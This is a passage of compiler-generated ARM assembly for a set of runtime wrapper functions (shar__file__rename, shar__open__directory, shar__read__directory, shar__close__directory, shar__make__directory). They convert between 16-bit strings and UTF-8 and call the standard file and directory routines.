lsr #27 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-182] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r1, r3, #24 ldr r3, [fp, #-68] add r2, r3, #1 ldr r3, [fp, #-144] add r2, r3, r2 and r3, r1, #255 strb r3, [r2] ldrh r3, [fp, #-182] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r1, r3, #24 ldr r3, [fp, #-68] add r2, r3, #2 ldr r3, [fp, #-144] add r2, r3, r2 and r3, r1, #255 strb r3, [r2] nop .L308: ldrb r0, [fp, #-185] @ zero_extendqisi2 mov r1, #0 sub r3, fp, #68 ldmia r3, {r2-r3} adds ip, r2, r0 str ip, [fp, #-228] adc r3, r3, r1 str r3, [fp, #-224] sub r3, fp, #228 ldmia r3, {r2-r3} str r2, [fp, #-68] str r3, [fp, #-64] b .L301 .L332: nop .L301: sub r3, fp, #52 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-236] adc r3, r3, #0 str r3, [fp, #-232] sub r3, fp, #236 ldmia r3, {r2-r3} str r2, [fp, #-52] str r3, [fp, #-48] .L299: sub r1, fp, #76 ldmia r1, {r0-r1} sub r3, fp, #52 ldmia r3, {r2-r3} cmp r1, r3 cmpeq r0, r2 bhi .L311 sub r3, fp, #60 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-212] adc r3, r3, #0 str r3, [fp, #-208] ldr r3, [fp, #-144] str r3, [fp, #-132] sub r3, fp, #212 ldmia r3, {r2-r3} str r2, [fp, #-36] str r3, [fp, #-32] ldr r3, [fp, #-36] mov r1, r3 ldr r0, [fp, #-132] bl realloc str r0, [fp, #-128] ldr r3, [fp, #-128] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L312 ldr r3, .L334 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L334+4 bl fwrite mov r0, #1 bl exit .L312: ldr r3, [fp, #-128] str r3, [fp, #-144] ldr r3, [fp, #-68] ldr r2, [fp, #-144] add r3, r2, r3 mov r2, #0 strb r2, [r3] ldr r3, [fp, #-144] str r3, [fp, #-180] ldmib fp, {r2-r3} str r2, [fp, #-124] str r3, [fp, #-120] ldr r3, [fp, #12] str r3, [fp, #-172] mov r3, #0 str r3, [fp, #-168] mov r2, #0 mov r3, #0 str r2, [fp, #-116] str r3, [fp, #-112] mov r2, #0 mov r3, #0 str r2, [fp, #-108] str r3, [fp, #-104] mov r2, #0 mov r3, #0 str r2, [fp, #-100] str r3, [fp, #-96] b .L315 .L327: ldr r3, [fp, #-100] lsl r3, r3, #1 ldr r2, [fp, #-172] add r3, r2, r3 ldrh r3, [r3] @ movhi strh r3, [fp, #-184] @ movhi mov r3, #0 strb r3, [fp, #-186] ldrh r3, [fp, #-184] cmp r3, #0 beq .L333 ldrh r3, [fp, #-184] cmp r3, #127 bhi .L318 mov r3, #1 strb r3, [fp, #-186] b .L319 .L318: ldrh r3, [fp, #-184] cmp r3, #2048 bcs .L320 mov r3, #2 strb r3, [fp, #-186] b .L319 .L320: mov r3, #3 strb r3, [fp, #-186] .L319: ldrb r2, [fp, #-186] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #108 ldmia r1, {r0-r1} adds r6, r0, r2 adc r7, r1, r3 str r6, [fp, #-108] str r7, [fp, #-104] ldr r3, [fp, #-168] str r3, [fp, #-164] sub r3, fp, #108 ldmia r3, {r2-r3} str r2, [fp, #-92] str r3, [fp, #-88] ldr r3, [fp, #-92] mov r1, r3 ldr r0, [fp, #-164] bl realloc str r0, [fp, #-160] ldr r3, [fp, #-160] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L321 ldr r3, .L334 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L334+4 bl fwrite mov r0, #1 bl exit .L321: ldr r3, [fp, #-160] str r3, [fp, #-168] ldrb r3, [fp, #-186] @ zero_extendqisi2 cmp r3, #3 beq .L323 cmp r3, #3 bgt .L324 cmp r3, #1 beq .L325 cmp r3, #2 beq .L326 b .L324 .L325: ldr r3, [fp, #-116] ldr r2, [fp, #-168] add r3, r2, r3 ldrh r2, [fp, #-184] @ movhi and r2, r2, #255 strb r2, [r3] b .L324 .L326: ldrh r3, [fp, #-184] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-116] ldr r1, [fp, #-168] add r2, r1, r2 mvn r3, r3, lsl #26 mvn r3, r3, lsr #26 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-184] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-116] add r3, r3, #1 ldr r1, [fp, #-168] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] b .L324 .L323: ldrh r3, [fp, #-184] lsr r3, r3, #12 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-116] ldr r1, [fp, #-168] add r2, r1, r2 mvn r3, r3, lsl #27 mvn r3, r3, lsr #27 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-184] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-116] add r3, r3, #1 ldr r1, [fp, #-168] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] ldrh r3, [fp, #-184] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-116] add r3, r3, #2 ldr r1, [fp, #-168] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] nop .L324: ldrb r2, [fp, #-186] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #116 ldmia r1, {r0-r1} adds r8, r0, r2 adc r9, r1, r3 str r8, [fp, #-116] str r9, [fp, #-112] b .L317 .L333: nop .L317: sub r3, fp, #100 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-244] adc r3, r3, #0 str r3, [fp, #-240] sub r3, fp, #244 ldmia r3, {r2-r3} str r2, [fp, #-100] str r3, [fp, #-96] .L315: sub r1, fp, #124 ldmia r1, {r0-r1} sub r3, fp, #100 ldmia r3, {r2-r3} cmp r1, r3 cmpeq r0, r2 bhi .L327 sub r3, fp, #108 ldmia r3, {r2-r3} adds r4, r2, #1 adc r5, r3, #0 ldr r3, [fp, #-168] str r3, [fp, #-156] str r4, [fp, #-84] str r5, [fp, #-80] ldr r3, [fp, #-84] mov r1, r3 ldr r0, [fp, #-156] bl realloc str r0, [fp, #-152] ldr r3, [fp, #-152] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L328 ldr r3, .L334 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L334+4 bl fwrite mov r0, #1 bl exit .L328: ldr r3, [fp, #-152] str r3, [fp, #-168] ldr r3, [fp, #-116] ldr r2, [fp, #-168] add r3, r2, r3 mov r2, #0 strb r2, [r3] ldr r3, [fp, #-168] str r3, [fp, #-176] ldr r1, [fp, #-176] ldr r0, [fp, #-180] bl rename mov r3, r0 cmp r3, #0 moveq r3, #1 movne r3, #0 strb r3, [fp, #-187] ldr r0, [fp, #-180] bl free ldr r0, [fp, #-176] bl free ldrb r3, [fp, #-187] @ zero_extendqisi2 mov r0, r3 sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L335: .align 2 .L334: .word stderr .word .LC0 .size shar__file__rename, .-shar__file__rename .align 2 .global shar__open__directory .syntax unified .arm .fpu softvfp .type shar__open__directory, %function shar__open__directory: @ args = 0, pretend = 0, frame = 112 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #112 str r0, [fp, #-124] str r1, [fp, #-120] str r2, [fp, #-128] str r3, [fp, #-132] sub r3, fp, #124 ldmia r3, {r2-r3} str r2, [fp, #-76] str r3, [fp, #-72] ldr r3, [fp, #-128] str r3, [fp, #-100] mov r3, #0 str r3, [fp, #-96] mov r2, #0 mov r3, #0 str r2, [fp, #-68] str r3, [fp, #-64] mov r2, #0 mov r3, #0 str r2, [fp, #-60] str r3, [fp, #-56] mov r2, #0 mov r3, #0 str r2, [fp, #-52] str r3, [fp, #-48] b .L337 .L349: ldr r3, [fp, #-52] lsl r3, r3, #1 ldr r2, [fp, #-100] add r3, r2, r3 ldrh r3, [r3] @ movhi strh r3, [fp, #-110] @ movhi mov r3, #0 strb r3, [fp, #-111] ldrh r3, [fp, #-110] cmp r3, #0 beq .L354 ldrh r3, [fp, #-110] cmp r3, #127 bhi .L340 mov r3, #1 strb r3, [fp, #-111] b .L341 .L340: ldrh r3, [fp, #-110] cmp r3, #2048 bcs .L342 mov r3, #2 strb r3, [fp, #-111] b .L341 .L342: mov r3, #3 strb r3, [fp, #-111] .L341: ldrb r2, [fp, #-111] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #60 ldmia r1, {r0-r1} adds r6, r0, r2 adc r7, r1, r3 str r6, [fp, #-60] str r7, [fp, #-56] ldr r3, [fp, #-96] str r3, [fp, #-92] sub r3, fp, #60 ldmia r3, {r2-r3} str r2, [fp, #-44] str r3, [fp, #-40] ldr r3, [fp, #-44] mov r1, r3 ldr r0, [fp, #-92] bl realloc str r0, [fp, #-88] ldr r3, [fp, #-88] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L343 ldr r3, .L355 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L355+4 bl fwrite mov r0, #1 bl exit .L343: ldr r3, [fp, #-88] str r3, [fp, #-96] ldrb r3, [fp, #-111] @ zero_extendqisi2 cmp r3, #3 beq .L345 cmp r3, #3 bgt .L346 cmp r3, #1 beq .L347 cmp r3, #2 beq .L348 b .L346 .L347: ldr r3, [fp, #-68] ldr r2, [fp, #-96] add r3, r2, r3 ldrh r2, [fp, #-110] @ movhi and r2, r2, #255 strb r2, [r3] b .L346 .L348: ldrh r3, [fp, #-110] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-68] ldr r1, [fp, #-96] add r2, r1, r2 mvn r3, r3, lsl #26 mvn r3, r3, lsr #26 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-110] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-68] add r3, r3, #1 ldr r1, [fp, #-96] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] b .L346 .L345: ldrh r3, [fp, #-110] lsr r3, r3, #12 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-68] ldr r1, [fp, #-96] add r2, r1, r2 mvn r3, r3, lsl #27 mvn r3, r3, lsr #27 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-110] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-68] add r3, r3, #1 ldr r1, [fp, #-96] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] ldrh r3, [fp, #-110] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-68] add r3, r3, #2 ldr r1, [fp, #-96] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] nop .L346: ldrb r2, [fp, #-111] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #68 ldmia r1, {r0-r1} adds r8, r0, r2 adc r9, r1, r3 str r8, [fp, #-68] str r9, [fp, #-64] b .L339 .L354: nop .L339: sub r3, fp, #52 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-140] adc r3, r3, #0 str r3, [fp, #-136] sub r3, fp, #140 ldmia r3, {r2-r3} str r2, [fp, #-52] str r3, [fp, #-48] .L337: sub r1, fp, #76 ldmia r1, {r0-r1} sub r3, fp, #52 ldmia r3, {r2-r3} cmp r1, r3 cmpeq r0, r2 bhi .L349 sub r3, fp, #60 ldmia r3, {r2-r3} adds r4, r2, #1 adc r5, r3, #0 ldr r3, [fp, #-96] str r3, [fp, #-84] str r4, [fp, #-36] str r5, [fp, #-32] ldr r3, [fp, #-36] mov r1, r3 ldr r0, [fp, #-84] bl realloc str r0, [fp, #-80] ldr r3, [fp, #-80] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L350 ldr r3, .L355 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L355+4 bl fwrite mov r0, #1 bl exit .L350: ldr r3, [fp, #-80] str r3, [fp, #-96] ldr r3, [fp, #-68] ldr r2, [fp, #-96] add r3, r2, r3 mov r2, #0 strb r2, [r3] ldr r3, [fp, #-96] str r3, [fp, #-108] ldr r0, [fp, #-108] bl opendir str r0, [fp, #-104] ldr r3, [fp, #-104] mov r2, r3 asr r3, r2, #31 ldr r1, [fp, #-132] stm r1, {r2-r3} ldr r0, [fp, #-108] bl free ldr r3, [fp, #-104] cmp r3, #0 movne r3, #1 moveq r3, #0 and r3, r3, #255 mov r0, r3 sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L356: .align 2 .L355: .word stderr .word .LC0 .size shar__open__directory, .-shar__open__directory .align 2 .global shar__read__directory .syntax unified .arm .fpu softvfp .type shar__read__directory, %function shar__read__directory: @ args = 12, pretend = 0, frame = 112 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #112 str r0, [fp, #-124] str r1, [fp, #-120] str r2, [fp, #-132] str r3, [fp, #-128] .L362: ldr r3, [fp, #-124] mov r0, r3 bl readdir str r0, [fp, #-108] ldr r3, [fp, #-108] cmp r3, #0 movne r3, #1 moveq r3, #0 strb r3, [fp, #-114] ldrb r3, [fp, #-114] eor r3, r3, #1 and r3, r3, #255 cmp r3, #0 bne .L393 ldr r3, [fp, #-108] add r3, r3, #11 str r3, [fp, #-104] ldr r0, [fp, #-104] bl strlen str r0, [fp, #-100] ldr r3, [fp, #-104] ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #46 bne .L360 ldr r3, [fp, #-100] cmp r3, #1 beq .L362 ldr r3, [fp, #-100] cmp r3, #2 bne .L360 ldr r3, [fp, #-104] add r3, r3, #1 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #46 bne .L360 b .L362 .L360: sub r3, fp, #132 ldmia r3, {r2-r3} str r2, [fp, #-68] str r3, [fp, #-64] ldr r3, [fp, #-104] str r3, [fp, #-96] ldr r3, [fp, #4] str r3, [fp, #-92] ldr r3, [fp, #8] str r3, [fp, #-88] mov r2, #0 mov r3, #0 str r2, [fp, #-60] str r3, [fp, #-56] ldr r2, [fp, #-68] ldr r3, [fp, #-64] orr r3, r2, r3 cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L363 mov r3, #0 str r3, [fp, #-84] b .L364 .L363: sub r3, fp, #68 ldmia r3, {r2-r3} str r2, [fp, #-52] str r3, [fp, #-48] ldr r3, [fp, #-52] mov r0, r3 bl malloc mov r3, r0 str r3, [fp, #-80] ldr r3, [fp, #-80] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L365 ldr r3, .L395 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L395+4 bl fwrite mov r0, #1 bl exit .L365: ldr r3, [fp, #-80] str r3, [fp, #-84] .L364: mov r2, #0 mov r3, #0 str r2, [fp, #-44] str r3, [fp, #-40] mov r3, #1 strb r3, [fp, #-113] .L378: ldr r3, [fp, #-44] ldr r2, [fp, #-96] add r3, r2, r3 ldrb r3, [r3] strb r3, [fp, #-112] ldrb r3, [fp, #-112] @ zero_extendqisi2 cmp r3, #0 beq .L394 mov r3, #0 strb r3, [fp, #-111] ldrb r3, [fp, #-112] @ zero_extendqisi2 strh r3, [fp, #-110] @ movhi ldrsb r3, [fp, #-112] cmp r3, #0 blt .L369 mov r3, #1 strb r3, [fp, #-111] b .L370 .L369: ldrb r3, [fp, #-112] @ zero_extendqisi2 and r3, r3, #224 cmp r3, #192 bne .L371 mov r3, #2 strb r3, [fp, #-111] ldr r3, [fp, #-44] add r3, r3, #1 ldr r2, [fp, #-96] add r3, r2, r3 ldrb r3, [r3] strb r3, [fp, #-112] ldrb r3, [fp, #-112] @ zero_extendqisi2 and r3, r3, #192 cmp r3, #128 movne r3, #1 moveq r3, #0 and r3, r3, #255 cmp r3, #0 beq .L372 mov r3, #0 strb r3, [fp, #-113] b .L368 .L372: ldrh r3, [fp, #-110] @ movhi eor r3, r3, #192 strh r3, [fp, #-110] @ movhi ldrh r3, [fp, #-110] @ movhi lsl r3, r3, #6 strh r3, [fp, #-110] @ movhi ldrb r3, [fp, #-112] eor r3, r3, #127 mvn r3, r3 and r3, r3, #255 lsl r3, r3, #16 lsr r2, r3, #16 ldrh r3, [fp, #-110] @ movhi orr r3, r2, r3 strh r3, [fp, #-110] @ movhi b .L370 .L371: ldrb r3, [fp, #-112] @ zero_extendqisi2 and r3, r3, #240 cmp r3, #224 bne .L373 mov r3, #3 strb r3, [fp, #-111] ldr r3, [fp, #-44] add r3, r3, #1 ldr r2, [fp, #-96] add r3, r2, r3 ldrb r3, [r3] strb r3, [fp, #-112] ldrb r3, [fp, #-112] @ zero_extendqisi2 and r3, r3, #192 cmp r3, #128 movne r3, #1 moveq r3, #0 and r3, r3, #255 cmp r3, #0 beq .L374 mov r3, #0 strb r3, [fp, #-113] b .L368 .L374: ldrh r3, [fp, #-110] @ movhi eor r3, r3, #224 strh r3, [fp, #-110] @ movhi ldrh r3, [fp, #-110] @ movhi lsl r3, r3, #6 strh r3, [fp, #-110] @ movhi ldrb r3, [fp, #-112] eor r3, r3, #127 mvn r3, r3 and r3, r3, #255 lsl r3, r3, #16 lsr r2, r3, #16 ldrh r3, [fp, #-110] @ movhi orr r3, r2, r3 strh r3, [fp, #-110] @ movhi ldr r3, [fp, #-44] add r3, r3, #2 ldr r2, [fp, #-96] add r3, r2, r3 ldrb r3, [r3] strb r3, [fp, #-112] ldrb r3, [fp, #-112] @ zero_extendqisi2 and r3, r3, #192 cmp r3, #128 movne r3, #1 moveq r3, #0 and r3, r3, #255 cmp r3, #0 beq .L375 mov r3, #0 strb r3, [fp, #-113] b .L368 .L375: ldrh r3, [fp, #-110] @ movhi lsl r3, r3, #6 strh r3, [fp, #-110] @ movhi ldrb r3, [fp, #-112] eor r3, r3, #127 mvn r3, r3 and r3, r3, #255 lsl r3, r3, #16 lsr r2, r3, #16 ldrh r3, [fp, #-110] @ movhi orr r3, r2, r3 strh r3, [fp, #-110] @ movhi b .L370 .L373: mov r3, #0 strb r3, [fp, #-113] b .L368 .L370: sub r3, fp, #60 ldmia r3, {r2-r3} adds r8, r2, #1 adc r9, r3, #0 str r8, [fp, #-60] str r9, [fp, #-56] sub r3, fp, #60 ldmia r3, {r2-r3} adds r1, r2, r2 str r1, [fp, #-140] adc r3, r3, r3 str r3, [fp, #-136] sub r1, fp, #140 ldmia r1, {r0-r1} sub r3, fp, #68 ldmia r3, {r2-r3} adds r6, r0, r2 adc r7, r1, r3 ldr r3, [fp, #-84] str r3, [fp, #-76] str r6, [fp, #-36] str r7, [fp, #-32] ldr r3, [fp, #-36] mov r1, r3 ldr r0, [fp, #-76] bl realloc str r0, [fp, #-72] ldr r3, [fp, #-72] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L376 ldr r3, .L395 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L395+4 bl fwrite mov r0, #1 bl exit .L376: ldr r3, [fp, #-72] str r3, [fp, #-84] ldr r2, [fp, #-68] ldr r3, [fp, #-60] sub r3, r3, #1 lsl r3, r3, #1 add r3, r2, r3 ldr r2, [fp, #-84] add r3, r2, r3 ldrh r2, [fp, #-110] @ movhi strh r2, [r3] @ movhi ldrb r2, [fp, #-111] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #44 ldmia r1, {r0-r1} adds r4, r0, r2 adc r5, r1, r3 str r4, [fp, #-44] str r5, [fp, #-40] b .L378 .L394: nop .L368: ldrb r3, [fp, #-113] eor r3, r3, #1 and r3, r3, #255 cmp r3, #0 beq .L379 ldr r3, [fp, #-84] cmp r3, #0 beq .L380 ldr r0, [fp, #-84] bl free .L380: mov r3, #0 str r3, [fp, #-84] mov r2, #0 mov r3, #0 str r2, [fp, #-60] str r3, [fp, #-56] .L379: ldr r3, [fp, #-88] ldr r2, [fp, #-84] str r2, [r3] ldr r1, [fp, #-92] sub r3, fp, #60 ldmia r3, {r2-r3} stm r1, {r2-r3} ldr r3, [fp, #-108] ldrb r3, [r3, #10] @ zero_extendqisi2 sub r3, r3, #1 cmp r3, #11 ldrls pc, [pc, r3, asl #2] b .L382 .L384: .word .L390 .word .L389 .word .L382 .word .L388 .word .L382 .word .L387 .word .L382 .word .L386 .word .L382 .word .L385 .word .L382 .word .L383 .L387: ldr r3, [fp, #12] mov r2, #0 strb r2, [r3] b .L391 .L389: ldr r3, [fp, #12] mov r2, #1 strb r2, [r3] b .L391 .L388: ldr r3, [fp, #12] mov r2, #2 strb r2, [r3] b .L391 .L390: ldr r3, [fp, #12] mov r2, #3 strb r2, [r3] b .L391 .L385: ldr r3, [fp, #12] mov r2, #4 strb r2, [r3] b .L391 .L386: ldr r3, [fp, #12] mov r2, #5 strb r2, [r3] b .L391 .L383: ldr r3, [fp, #12] mov r2, #6 strb r2, [r3] b .L391 .L382: ldr r3, [fp, #12] mvn r2, #0 strb r2, [r3] nop .L391: b .L359 .L393: nop .L359: ldrb r3, [fp, #-114] @ zero_extendqisi2 mov r0, r3 sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L396: .align 2 .L395: .word stderr .word .LC0 .size shar__read__directory, .-shar__read__directory .align 2 .global shar__close__directory .syntax unified .arm .fpu softvfp .type shar__close__directory, %function shar__close__directory: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-12] str r1, [fp, #-8] ldr r3, [fp, #-12] mov r0, r3 bl closedir nop sub sp, fp, #4 @ sp needed pop {fp, pc} .size shar__close__directory, .-shar__close__directory .align 2 .global shar__make__directory .syntax unified .arm .fpu softvfp .type shar__make__directory, %function shar__make__directory: @ args = 0, pretend = 0, frame = 104 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #104 str r0, [fp, #-116] str r1, [fp, #-112] str r2, [fp, #-120] strb r3, [fp, #-121] sub r3, fp, #116 ldmia r3, {r2-r3} str r2, [fp, #-76] str r3, [fp, #-72] ldr r3, [fp, #-120] str r3, [fp, #-100] mov r3, #0 str r3, [fp, #-96] mov r2, #0 mov r3, #0 str r2, [fp, #-68] str r3, [fp, #-64] mov r2, #0 mov r3, #0 str r2, [fp, #-60] str r3, [fp, #-56] mov r2, #0 mov r3, #0 str r2, [fp, #-52] str r3, [fp, #-48] b .L399 .L411: ldr r3, [fp, #-52] lsl r3, r3, #1 ldr r2, [fp, #-100] add r3, r2, r3 ldrh r3, [r3] @ movhi strh r3, [fp, #-106] @ movhi mov r3, #0 strb r3, [fp, #-107] ldrh r3, [fp, #-106] cmp r3, #0 beq .L417 ldrh r3, [fp, #-106] cmp r3, #127 bhi .L402 mov r3, #1 strb r3, [fp, #-107] b .L403 .L402: ldrh r3, [fp, #-106] cmp r3, #2048 bcs .L404 mov r3, #2 strb r3, [fp, #-107] b .L403 .L404: mov r3, #3 strb r3, [fp, #-107] .L403: ldrb r2, [fp, #-107] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #60 ldmia r1, {r0-r1} adds r6, r0, r2 adc r7, r1, r3 str r6, [fp, #-60] str r7, [fp, #-56] ldr r3, [fp, #-96] str r3, [fp, #-92] sub r3, fp, #60 ldmia r3, {r2-r3} str r2, [fp, #-44] str r3, [fp, #-40] ldr r3, [fp, #-44] mov r1, r3 ldr r0, [fp, #-92] bl realloc str r0, [fp, #-88] ldr r3, [fp, #-88] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L405 ldr r3, .L418 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L418+4 bl fwrite mov r0, #1 bl exit .L405: ldr r3, [fp, #-88] str r3, [fp, #-96] ldrb r3, [fp, #-107] @ zero_extendqisi2 cmp r3, #3 beq .L407 cmp r3, #3 bgt .L408 cmp r3, #1 beq .L409 cmp r3, #2 beq .L410 b .L408 .L409: ldr r3, [fp, #-68] ldr r2, [fp, #-96] add r3, r2, r3 ldrh r2, [fp, #-106] @ movhi and r2, r2, #255 strb r2, [r3] b .L408 .L410: ldrh r3, [fp, #-106] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-68] ldr r1, [fp, #-96] add r2, r1, r2 mvn r3, r3, lsl #26 mvn r3, r3, lsr #26 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-106] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-68] add r3, r3, #1 ldr r1, [fp, #-96] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] b .L408 .L407: ldrh r3, [fp, #-106] lsr r3, r3, #12 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-68] ldr r1, [fp, #-96] add r2, r1, r2 mvn r3, r3, lsl #27 mvn r3, r3, lsr #27 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-106] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-68] add r3, r3, #1 ldr r1, [fp, #-96] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] ldrh r3, [fp, #-106] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-68] add r3, r3, #2 ldr r1, [fp, #-96] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] nop .L408: ldrb r2, [fp, #-107] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #68 ldmia r1, {r0-r1} adds r8, r0, r2 adc r9, r1, r3 str r8, [fp, #-68] str r9, [fp, #-64] b .L401 .L417: nop .L401: sub r3, fp, #52 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-132] adc r3, r3, #0 str r3, [fp, #-128] sub r3, fp, #132 ldmia r3, {r2-r3} str r2, [fp, #-52] str r3, [fp, #-48] .L399: sub r1, fp, #76 ldmia r1, {r0-r1} sub r3, fp, #52 ldmia r3, {r2-r3} cmp r1, r3 cmpeq r0, r2 bhi .L411 sub r3, fp, #60 ldmia r3, {r2-r3} adds r4, r2, #1 adc r5, r3, #0 ldr r3, [fp, #-96] str r3, [fp, #-84] str r4, [fp, #-36] str r5, [fp, #-32] ldr r3, [fp, #-36] mov r1, r3 ldr r0, [fp, #-84] bl realloc str r0, [fp, #-80] ldr r3, [fp, #-80] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L412 ldr r3, .L418 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L418+4 bl fwrite mov r0, #1 bl exit .L412: ldr r3, [fp, #-80] str r3, [fp, #-96] ldr r3, [fp, #-68] ldr r2, [fp, #-96] add r3, r2, r3 mov r2, #0 strb r2, [r3] ldr r3, [fp, #-96] str r3, [fp, #-104] ldr r1, .L418+8 ldr r0, [fp, #-104] bl mkdir mov r3, r0 cmp r3, #0 moveq r3, #1 movne r3, #0 strb r3, [fp, #-108] ldrb r3, [fp, 